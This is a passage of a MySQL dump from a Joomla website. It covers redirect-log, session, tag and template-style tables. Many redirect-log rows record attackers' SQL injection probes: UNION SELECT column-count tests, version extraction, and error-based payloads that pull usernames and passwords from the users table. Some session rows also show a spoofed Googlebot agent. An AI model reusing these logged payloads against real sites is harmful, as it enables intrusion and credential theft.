00:00:00'),(340,'http://www.fitoman.com/index.php/component/content/article?id=1321111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) -- /* order by \'as /*','','','',1,0,'2016-06-13 11:12:20','0000-00-00 00:00:00'),(341,'http://www.fitoman.com/index.php/component/content/article?id=1321111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) -- /* order by \'as /*','','','',1,0,'2016-06-13 11:12:21','0000-00-00 00:00:00'),(342,'http://www.fitoman.com/index.php/component/content/article?id=1321111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45) -- /* order ','','','',1,0,'2016-06-13 11:12:21','0000-00-00 00:00:00'),(343,'http://www.fitoman.com/index.php/component/content/article?id=1321111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,','','','',1,0,'2016-06-13 11:12:22','0000-00-00 00:00:00'),(344,'http://www.fitoman.com/index.php/component/content/article?id=1321111111111111\" UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by \"as /*','','','',1,0,'2016-06-13 11:12:30','0000-00-00 00:00:00'),(345,'http://www.fitoman.com/index.php/component/content/article?id=1321111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /* order by \"as /*','','','',1,0,'2016-06-13 11:12:30','0000-00-00 00:00:00'),(346,'http://www.fitoman.com/index.php/component/content/article?id=1321111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) -- /* order by \"as /*','','','',1,0,'2016-06-13 11:12:31','0000-00-00 00:00:00'),(347,'http://www.fitoman.com/index.php/component/content/article?id=1321111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) -- /* order by \"as /*','','','',1,0,'2016-06-13 11:12:31','0000-00-00 00:00:00'),(348,'http://www.fitoman.com/index.php/component/content/article?id=1321111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) -- /* order by \"as /*','','','',1,0,'2016-06-13 11:12:31','0000-00-00 00:00:00'),(349,'http://www.fitoman.com/index.php/component/content/article?id=1321111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45) -- /* order ','','','',1,0,'2016-06-13 11:12:32','0000-00-00 00:00:00'),(350,'http://www.fitoman.com/index.php/component/content/article?id=1321111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,','','','',1,0,'2016-06-13 11:12:32','0000-00-00 00:00:00'),(351,'http://www.fitoman.com/index.php/component/content/article?id=132999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2016-06-13 11:13:25','0000-00-00 00:00:00'),(352,'http://www.fitoman.com/index.php/component/content/article?id=13299999\' union select unhex(hex(version())) -- \'x\'=\'x','','','',1,0,'2016-06-13 11:13:43','0000-00-00 00:00:00'),(353,'http://www.fitoman.com/index.php/component/content/article?id=13299999\" union select unhex(hex(version())) -- \"x\"=\"x','','','',1,0,'2016-06-13 11:13:44','0000-00-00 00:00:00'),(354,'http://fitoman.com/index.php/superadmin/','','','',1,0,'2016-06-13 16:59:41','0000-00-00 00:00:00'),(355,'http://fitoman.com/index.php/admin123/','','','',1,0,'2016-06-13 16:59:43','0000-00-00 00:00:00'),(356,'http://fitoman.com/index.php/shop/','','','',1,0,'2016-06-13 16:59:44','0000-00-00 00:00:00'),(357,'http://fitoman.com/index.php?option=com_easyblog&view=dashboard&layout=write','','http://fitoman.com/','',3,0,'2016-06-13 20:37:11','0000-00-00 00:00:00'),(358,'http://www.fitoman.com/index.php?option=com_user&view=registration','','http://www.fitoman.com/index.php?option=com_user&view=registration','',1,0,'2016-07-11 23:12:50','0000-00-00 00:00:00'),(359,'http://www.fitoman.com/index.php/component/content/article?id=222121121121212.1','','','',2,0,'2016-07-25 00:19:30','0000-00-00 00:00:00'),(360,'http://www.fitoman.com/index.php/component/content/article?id=221111111111111 UNION SELECT CHAR(45,120,49,45,81,45) -- /*','','','',5,0,'2016-07-25 00:22:08','0000-00-00 00:00:00'),(361,'http://www.fitoman.com/index.php/component/content/article?id=221111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /*','','','',5,0,'2016-07-25 00:22:26','0000-00-00 00:00:00'),(362,'http://www.fitoman.com/index.php/component/content/article?id=221111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) -- /*','','','',5,0,'2016-07-25 00:22:44','0000-00-00 00:00:00'),(363,'http://www.fitoman.com/index.php/component/content/article?id=221111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) -- /*','','','',5,0,'2016-07-25 00:23:02','0000-00-00 00:00:00'),(364,'http://www.fitoman.com/index.php/component/content/article?id=221111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) -- /*','','','',5,0,'2016-07-25 00:23:20','0000-00-00 00:00:00'),(365,'http://www.fitoman.com/index.php/component/content/article?id=221111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45) -- /*','','','',5,0,'2016-07-25 00:23:38','0000-00-00 00:00:00'),(366,'http://www.fitoman.com/index.php/component/content/article?id=221111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55','','','',1,0,'2016-07-25 00:23:56','0000-00-00 00:00:00'),(367,'http://www.fitoman.com/index.php/component/content/article?id=221111111111111\' UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by \'as /*','','','',3,0,'2016-07-25 00:26:44','0000-00-00 00:00:00'),(368,'http://www.fitoman.com/index.php/component/content/article?id=221111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /* order by \'as /*','','','',3,0,'2016-07-25 00:27:02','0000-00-00 00:00:00'),(369,'http://www.fitoman.com/index.php/component/content/article?id=221111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) -- /* order by \'as /*','','','',3,0,'2016-07-25 00:27:20','0000-00-00 00:00:00'),(370,'http://www.fitoman.com/index.php/component/content/article?id=221111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) -- /* order by \'as /*','','','',3,0,'2016-07-25 00:27:38','0000-00-00 00:00:00'),(371,'http://www.fitoman.com/index.php/component/content/article?id=221111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) -- /* order by \'as /*','','','',3,0,'2016-07-25 00:27:56','0000-00-00 00:00:00'),(372,'http://www.fitoman.com/index.php/component/content/article?id=221111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45) -- /* order b','','','',1,0,'2016-07-25 00:28:14','0000-00-00 00:00:00'),(373,'http://www.fitoman.com/index.php/component/content/article?id=221111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,5','','','',1,0,'2016-07-25 00:28:32','0000-00-00 00:00:00'),(374,'http://www.fitoman.com/index.php/component/content/article?id=221111111111111\" UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by \"as /*','','','',3,0,'2016-07-25 00:30:44','0000-00-00 00:00:00'),(375,'http://www.fitoman.com/index.php/component/content/article?id=221111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /* order by \"as /*','','','',3,0,'2016-07-25 00:31:02','0000-00-00 00:00:00'),(376,'http://www.fitoman.com/index.php/component/content/article?id=221111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) -- /* order by \"as /*','','','',3,0,'2016-07-25 00:31:20','0000-00-00 00:00:00'),(377,'http://www.fitoman.com/index.php/component/content/article?id=221111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) -- /* order by \"as /*','','','',3,0,'2016-07-25 00:31:38','0000-00-00 00:00:00'),(378,'http://www.fitoman.com/index.php/component/content/article?id=221111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) -- /* order by \"as /*','','','',3,0,'2016-07-25 00:31:56','0000-00-00 00:00:00'),(379,'http://www.fitoman.com/index.php/component/content/article?id=221111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45) -- /* order b','','','',1,0,'2016-07-25 00:32:14','0000-00-00 00:00:00'),(380,'http://www.fitoman.com/index.php/component/content/article?id=221111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,5','','','',1,0,'2016-07-25 00:32:32','0000-00-00 00:00:00'),(381,'http://www.fitoman.com/index.php/component/content/article?id=22999999.1 union select unhex(hex(version())) -- and 1=1','','','',2,0,'2016-07-25 01:09:23','0000-00-00 00:00:00'),(382,'http://www.fitoman.com/index.php/component/content/article?id=2299999\' union select unhex(hex(version())) -- \'x\'=\'x','','','',2,0,'2016-07-25 01:09:42','0000-00-00 00:00:00'),(383,'http://www.fitoman.com/index.php/component/content/article?id=2299999\" union select unhex(hex(version())) -- \"x\"=\"x','','','',2,0,'2016-07-25 01:10:00','0000-00-00 00:00:00'),(384,'http://www.fitoman.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=2','','','',2,0,'2016-07-26 04:35:31','0000-00-00 00:00:00'),(385,'http://fitoman.com/index.php?option=com_flippingbook','','','',2,0,'2016-08-15 17:35:38','0000-00-00 00:00:00'),(386,'http://fitoman.com/index.php?option=com_userlist','','','',2,0,'2016-08-15 17:35:39','0000-00-00 00:00:00'),(387,'http://fitoman.com/index.php?option=com_dtregister','','','',2,0,'2016-08-15 17:35:40','0000-00-00 00:00:00'),(388,'http://www.fitoman.com/index.php/component/content/article?id=912121121121212.1','','','',7,0,'2016-08-19 09:40:50','0000-00-00 00:00:00'),(389,'http://www.fitoman.com/index.php/component/content/article?id=91999999.1 union select unhex(hex(version())) -- and 1=1','','','',2,0,'2016-08-19 09:48:10','0000-00-00 00:00:00'),(390,'http://www.fitoman.com/index.php/component/content/article?id=9199999\' union select unhex(hex(version())) -- \'x\'=\'x','','','',2,0,'2016-08-19 09:48:28','0000-00-00 00:00:00'),(391,'http://www.fitoman.com/index.php/component/content/article?id=9199999\" union select unhex(hex(version())) -- \"x\"=\"x','','','',2,0,'2016-08-19 09:48:46','0000-00-00 00:00:00'),(392,'http://www.fitoman.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2016-08-23 22:42:36','0000-00-00 00:00:00'),(393,'http://fitoman.com/index.php?option=\'or(ExtractValue(1,concat(0x3a,(select(pi())))))=\'1','','','',2,0,'2016-09-03 00:07:49','0000-00-00 00:00:00'),(394,'http://fitoman.com/index.php?option=com_facileforms','','','',1,0,'2016-09-03 10:35:53','0000-00-00 00:00:00'),(395,'http://fitoman.com/index.php?option=com_breezingforms','','','',1,0,'2016-09-03 10:35:54','0000-00-00 00:00:00'),(396,'http://fitoman.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+AND+(SELECT+9999+FROM(SELECT+COUNT(*),CONCAT(0x7e,0x7e,(select concat(uu.username,0x7e,0x7e,uu.password) from saitc_users as uu inner join saitc_user_usergroup_map as uu','','','',1,0,'2016-09-06 04:25:21','0000-00-00 00:00:00'),(397,'http://fitoman.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+AND+(SELECT+9999+FROM(SELECT+COUNT(*),CONCAT(0x7e,0x7e,(select concat(uu.username,0x7e,0x7e,0x7e,uu.password) from saitc_users as uu inner join saitc_user_usergroup_map ','','','',1,0,'2016-09-07 03:08:12','0000-00-00 00:00:00'),(398,'http://fitoman.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+AND+(SELECT+9999+FROM(SELECT+COUNT(*),CONCAT(0x7e,0x5f,(select+concat(uu.username,0x7e,0x5f,0x7e,uu.password)+from+#__users+as+uu+inner+join+#__user_usergroup_map+as+uum','','','',1,0,'2016-09-08 01:34:59','0000-00-00 00:00:00'),(399,'http://fitoman.com/index.php?option=com_bt_media&view=list&categories[0]=1)+AND+(SELECT+1125+FROM(SELECT+COUNT(*),CONCAT(0x5f,0x7e,0x5f,(select+left(uu.username,100)+from+#__users+as+uu+inner+join+#__user_usergroup_map+as+uum+on+uu.id+=+uum.user_id+where+','','','',1,0,'2016-09-08 05:45:57','0000-00-00 00:00:00'),(400,'http://fitoman.com/index.php?option=\'or(ExtractValue(1,concat(0x7e,0x5f,0x7e,(select+uu.username+from+#__users+as+uu+inner+join+#__user_usergroup_map+as+uum+on+uu.id+=+uum.user_id+where+uum.group_id=8+limit+1),0x7e,0x5f,0x7e)))=\'1','','','',1,0,'2016-09-13 22:51:50','0000-00-00 00:00:00'),(401,'http://www.fitoman.com/index.php/component/k2/item/add?tmpl=component','','','',1,0,'2016-09-27 09:08:21','0000-00-00 00:00:00'); /*!40000 ALTER TABLE `fit_redirect_links` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_schemas` -- DROP TABLE IF EXISTS `fit_schemas`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_schemas` ( `extension_id` int(11) NOT NULL, `version_id` varchar(20) NOT NULL, PRIMARY KEY (`extension_id`,`version_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_schemas` -- LOCK TABLES `fit_schemas` WRITE; /*!40000 ALTER TABLE `fit_schemas` DISABLE KEYS */; INSERT INTO `fit_schemas` VALUES (700,'3.3.0-2014-04-02'); /*!40000 ALTER TABLE `fit_schemas` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_session` -- DROP TABLE IF EXISTS `fit_session`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_session` ( `session_id` varchar(200) NOT NULL default '', `client_id` tinyint(3) unsigned NOT NULL default '0', `guest` tinyint(4) unsigned default '1', `time` varchar(14) default '', `data` mediumtext, `userid` int(11) default '0', `username` varchar(150) default '', PRIMARY KEY (`session_id`), KEY `userid` (`userid`), KEY `time` (`time`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_session` -- LOCK TABLES `fit_session` WRITE; /*!40000 ALTER TABLE `fit_session` DISABLE KEYS */; INSERT INTO `fit_session` VALUES ('r302qf6drmdhr3998vqm1urf44',0,1,'1475234549','__default|a:8:{s:15:\"session.counter\";i:1;s:19:\"session.timer.start\";i:1475234547;s:18:\"session.timer.last\";i:1475234547;s:17:\"session.timer.now\";i:1475234547;s:24:\"session.client.forwarded\";s:12:\"45.63.56.184\";s:22:\"session.client.browser\";s:77:\"general.useragent.override;Googlebot/2.1(+http://www.googlebot.com/bot.html )\";s:8:\"registry\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\\0\\0\\0data\";O:8:\"stdClass\":0:{}}s:4:\"user\";O:5:\"JUser\":25:{s:9:\"\\0\\0\\0isRoot\";b:0;s:2:\"id\";i:0;s:4:\"name\";N;s:8:\"username\";N;s:5:\"email\";N;s:8:\"password\";N;s:14:\"password_clear\";s:0:\"\";s:5:\"block\";N;s:9:\"sendEmail\";i:0;s:12:\"registerDate\";N;s:13:\"lastvisitDate\";N;s:10:\"activation\";N;s:6:\"params\";N;s:6:\"groups\";a:1:{i:0;s:1:\"1\";}s:5:\"guest\";i:1;s:13:\"lastResetTime\";N;s:10:\"resetCount\";N;s:12:\"requireReset\";N;s:10:\"\\0\\0\\0_params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\\0\\0\\0data\";O:8:\"stdClass\":0:{}}s:14:\"\\0\\0\\0_authGroups\";a:1:{i:0;i:1;}s:14:\"\\0\\0\\0_authLevels\";a:2:{i:0;i:1;i:1;i:1;}s:15:\"\\0\\0\\0_authActions\";N;s:12:\"\\0\\0\\0_errorMsg\";N;s:10:\"\\0\\0\\0_errors\";a:0:{}s:3:\"aid\";i:0;}}',0,''),('rrlgce7s9s50e0k9r5gt59huq2',0,1,'1475234526','__default|a:8:{s:15:\"session.counter\";i:1;s:19:\"session.timer.start\";i:1475234517;s:18:\"session.timer.last\";i:1475234517;s:17:\"session.timer.now\";i:1475234517;s:24:\"session.client.forwarded\";s:12:\"45.63.56.184\";s:22:\"session.client.browser\";s:77:\"general.useragent.override;Googlebot/2.1(+http://www.googlebot.com/bot.html )\";s:8:\"registry\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\\0\\0\\0data\";O:8:\"stdClass\":0:{}}s:4:\"user\";O:5:\"JUser\":25:{s:9:\"\\0\\0\\0isRoot\";b:0;s:2:\"id\";i:0;s:4:\"name\";N;s:8:\"username\";N;s:5:\"email\";N;s:8:\"password\";N;s:14:\"password_clear\";s:0:\"\";s:5:\"block\";N;s:9:\"sendEmail\";i:0;s:12:\"registerDate\";N;s:13:\"lastvisitDate\";N;s:10:\"activation\";N;s:6:\"params\";N;s:6:\"groups\";a:1:{i:0;s:1:\"1\";}s:5:\"guest\";i:1;s:13:\"lastResetTime\";N;s:10:\"resetCount\";N;s:12:\"requireReset\";N;s:10:\"\\0\\0\\0_params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\\0\\0\\0data\";O:8:\"stdClass\":0:{}}s:14:\"\\0\\0\\0_authGroups\";a:1:{i:0;i:1;}s:14:\"\\0\\0\\0_authLevels\";a:2:{i:0;i:1;i:1;i:1;}s:15:\"\\0\\0\\0_authActions\";N;s:12:\"\\0\\0\\0_errorMsg\";N;s:10:\"\\0\\0\\0_errors\";a:0:{}s:3:\"aid\";i:0;}}',0,''); /*!40000 ALTER TABLE `fit_session` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_tags` -- DROP TABLE IF EXISTS `fit_tags`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_tags` ( `id` int(10) unsigned NOT NULL auto_increment, `parent_id` int(10) unsigned NOT NULL default '0', `lft` int(11) NOT NULL default '0', `rgt` int(11) NOT NULL default '0', `level` int(10) unsigned NOT NULL default '0', `path` varchar(255) NOT NULL default '', `title` varchar(255) NOT NULL, `alias` varchar(255) character set utf8 collate utf8_bin NOT NULL default '', `note` varchar(255) NOT NULL default '', `description` mediumtext NOT NULL, `published` tinyint(1) NOT NULL default '0', `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `access` int(10) unsigned NOT NULL default '0', `params` text NOT NULL, `metadesc` varchar(1024) NOT NULL COMMENT 'The meta description for the page.', `metakey` varchar(1024) NOT NULL COMMENT 'The meta keywords for the page.', `metadata` varchar(2048) NOT NULL COMMENT 'JSON encoded metadata properties.', `created_user_id` int(10) unsigned NOT NULL default '0', `created_time` datetime NOT NULL default '0000-00-00 00:00:00', `created_by_alias` varchar(255) NOT NULL default '', `modified_user_id` int(10) unsigned NOT NULL default '0', `modified_time` datetime NOT NULL default '0000-00-00 00:00:00', `images` text NOT NULL, `urls` text NOT NULL, `hits` int(10) unsigned NOT NULL default '0', `language` char(7) NOT NULL, `version` int(10) unsigned NOT NULL default '1', `publish_up` datetime NOT NULL default '0000-00-00 00:00:00', `publish_down` datetime NOT NULL default '0000-00-00 00:00:00', PRIMARY KEY (`id`), KEY `tag_idx` (`published`,`access`), KEY `idx_access` (`access`), KEY `idx_checkout` (`checked_out`), KEY `idx_path` (`path`), KEY `idx_left_right` (`lft`,`rgt`), KEY `idx_alias` (`alias`), KEY `idx_language` (`language`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_tags` -- LOCK TABLES `fit_tags` WRITE; /*!40000 ALTER TABLE `fit_tags` DISABLE KEYS */; INSERT INTO `fit_tags` VALUES (1,0,0,1,0,'','ROOT','root','','',1,0,'0000-00-00 00:00:00',1,'{}','','','',736,'2011-01-01 00:00:01','',0,'0000-00-00 00:00:00','','',0,'*',1,'0000-00-00 00:00:00','0000-00-00 00:00:00'); /*!40000 ALTER TABLE `fit_tags` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_template_styles` -- DROP TABLE IF EXISTS `fit_template_styles`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_template_styles` ( `id` int(10) unsigned NOT NULL auto_increment, `template` varchar(50) NOT NULL default '', `client_id` tinyint(1) unsigned NOT NULL default '0', `home` char(7) NOT NULL default '0', `title` varchar(255) NOT NULL default '', `params` text NOT NULL, PRIMARY KEY (`id`), KEY `idx_template` (`template`), KEY `idx_home` (`home`) ) ENGINE=InnoDB AUTO_INCREMENT=128 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_template_styles` -- LOCK TABLES `fit_template_styles` WRITE; /*!40000 ALTER TABLE `fit_template_styles` DISABLE KEYS */; INSERT INTO `fit_template_styles` VALUES (2,'bluestork',1,'0','Bluestork - Default','{\"useRoundedCorners\":\"1\",\"showSiteName\":\"0\"}'),(3,'atomic',0,'0','Atomic - Default','{}'),(4,'beez_20',0,'0','Beez2 - Default','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"logo\":\"images\\/joomla_black.gif\",\"sitetitle\":\"Joomla!\",\"sitedescription\":\"Open Source Content Management\",\"navposition\":\"left\",\"templatecolor\":\"personal\",\"html5\":\"0\"}'),(5,'hathor',1,'0','Hathor - Default','{\"showSiteName\":\"0\",\"colourChoice\":\"\",\"boldText\":\"0\"}'),(6,'beez5',0,'0','Beez5 - Default-Fruit Shop','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"logo\":\"images\\/sampledata\\/fruitshop\\/fruits.gif\",\"sitetitle\":\"Matuna Market \",\"sitedescription\":\"Fruit Shop Sample Site\",\"navposition\":\"left\",\"html5\":\"0\"}'),(114,'beez_20',0,'0','Beez2 - Parks Site','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"logo\":\"\",\"sitetitle\":\"Australian Parks\",\"sitedescription\":\"Parks Sample Site\",\"navposition\":\"center\",\"templatecolor\":\"nature\"}'),(121,'test',0,'0','test - Default','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"templatecolor\":\"nature\"}'),(124,'tx_zenith_ii',0,'1','Tx_Zenith_II - Default','{\"style\":\"default\",\"stylus-enabled\":\"0\",\"stylus-module-title-color\":\"f2560e\",\"stylus-article-title-color\":\"5bd954\",\"stylus-background-color\":\"fffff\",\"stylus-background-image\":\"-1\",\"stylus-background-image-repeat\":\"repeat\",\"stylus-header-bg-color\":\"555555\",\"stylus-header-text-color\":\"555555\",\"stylus-header-link-color\":\"bada55\",\"stylus-header-link-hover-color\":\"f2560e\",\"stylus-header-image\":\"-1\",\"stylus-header-image-repeat\":\"repeat\",\"stylus-top-bg-color\":\"555555\",\"stylus-top-text-color\":\"555555\",\"stylus-top-link-color\":\"bada55\",\"stylus-top-link-hover-color\":\"f2560e\",\"stylus-top-image\":\"-1\",\"stylus-top-image-repeat\":\"repeat\",\"stylus-feature-bg-color\":\"dddddd\",\"stylus-feature-text-color\":\"555555\",\"stylus-feature-link-color\":\"f2560e\",\"stylus-feature-link-hover-color\":\"3d3a38\",\"stylus-feature-image\":\"-1\",\"stylus-feature-image-repeat\":\"repeat\",\"stylus-maincontent-bg-color\":\"dddddd\",\"stylus-maincontent-text-color\":\"555555\",\"stylus-maincontent-link-color\":\"f2560e\",\"stylus-maincontent-link-hover-color\":\"3d3a38\",\"stylus-maincontent-image\":\"-1\",\"stylus-maincontent-image-repeat\":\"repeat\",\"stylus-bottom-bg-color\":\"eeeeee\",\"stylus-bottom-text-color\":\"222222\",\"stylus-bottom-link-color\":\"0ea8f0\",\"stylus-bottom-link-hover-color\":\"0ea8f0\",\"stylus-bottom-image\":\"-1\",\"stylus-bottom-image-repeat\":\"repeat\",\"stylus-footer-bg-color\":\"000000\",\"stylus-footer-text-color\":\"ffffff\",\"stylus-footer-link-color\":\"30a8f4\",\"stylus-footer-link-hover-color\":\"30a8f4\",\"stylus-footer-image\":\"-1\",\"stylus-footer-image-repeat\":\"repeat\",\"logo-enabled\":\"1\",\"logo-type\":\"image\",\"logo-text\":\"FIT\",\"logo-position\":\"top-1\",\"logo-mobile\":\"1\",\"logo-image\":\"images\\/logloW.png\",\"logo-display-tagline\":\"0\",\"date-enabled\":\"0\",\"date-position\":\"roof-1\",\"date-formats\":\"l, F d, Y\",\"copyrightinfo-enabled\":\"1\",\"copyrightinfo-position\":\"copyright-1\",\"copyrightinfo-text\":\"Copyright \\u00a9 2015 FIT, All rights reserved.\",\"copyrightinfo-mobile\":\"0\",\"fontresizer-enabled\":\"0\",\"fontresizer-position\":\"roof-5\",\"fontresizer-selector\":\"body\",\"totop-enabled\":\"1\",\"totop-position\":\"copyright-2\",\"wordformat-enabled\":\"0\",\"wordformat-selector\":\"header h2 a\",\"lazyloader-enabled\":\"0\",\"modernizr-enabled\":\"0\",\"exposelogo-enabled\":\"0\",\"exposelogo-type\":\"light\",\"exposelogo-position\":\"copyright-1\",\"analytics-enabled\":\"0\",\"analytics-id\":\"UA-xxxxxx-x\",\"social-enabled\":\"0\",\"social-position\":\"footer-1\",\"social-twitter\":\"http:\\/\\/www.twitter.com\\/ThemeXpert\",\"social-facebook\":\"http:\\/\\/www.facebook.com\\/ThemeXpert\",\"social-gplus\":\"http:\\/\\/plus.google.com\\/102243594488216874926\",\"social-lin\":\"http:\\/\\/www.facebook.com\\/ThemeXpert\",\"social-ytube\":\"\",\"social-rss\":\"http:\\/\\/www.themexpert.com\\/\",\"designedby-enabled\":\"1\",\"designedby-position\":\"copyright-1\",\"equalheight-enabled\":\"1\",\"menu-enabled\":\"1\",\"menu-style\":\"mega\",\"menutype\":\"mainmenu\",\"menu-position\":\"top-2\",\"menu-animation\":\"slide-bottom\",\"menu-animation-sublevel\":\"slide-right\",\"menu-startlevel\":\"1\",\"menu-endlevel\":\"0\",\"splitmenu-title\":\"1\",\"splitmenu-title-text\":\"Sub 